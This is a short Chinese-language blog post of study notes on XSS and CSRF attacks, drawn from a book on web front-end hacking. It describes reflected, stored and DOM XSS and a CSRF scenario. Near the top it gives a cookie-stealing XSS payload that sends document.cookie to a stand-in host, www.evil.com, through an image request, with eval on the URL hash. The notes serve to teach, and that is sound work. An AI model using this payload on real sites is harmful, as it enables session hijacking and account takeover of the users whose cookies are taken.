谈谈CSRF与XSS攻击

《web前端黑客技术揭秘》学习概要

xss攻击的发生

跨站攻击发生在浏览器端,通常为信息盗取;

url="http://hahahah.com#new%20Image().src="http://www.evil.com/stea
l.php?c="+escape(document.cookie)"
eval(location.hash.substr());

被攻击者被诱骗到该网站上,点击链接后黑客将盗取Cookie会话信息,黑客利用该cookie可以登陆账号并越权操作;
分类:
反射型xss:
xss代码出现在URL中,作为输入提交到服务端,服务端解析后响应;
响应内容中出现这段xss代码,最后浏览器解析执行。
过程就像一次反射,固称为反射型xss
存储型xss
提交xss会存储在服务端,下次请求页面时不会再次提交。
最隐蔽
DOM XSS
cookieXSS

CSRF

俗称“借刀杀人法”
场景设定:

  1. 提供一条包含恶意代码的后台链接,url需要事先做转码变换,以达到隐蔽效果;
  2. 管理员被诱导点开此链接;
  3. 发生csrf了,利用管理员权限进行后续的操作;
    目标网站A的用户被欺骗访问了恶意网站B的页面时,一个跨站伪造的POST表单请求就发出了,同时这个请求带上了目标网站A的用户cookie;

你可能感兴趣的:(谈谈CSRF与XSS攻击)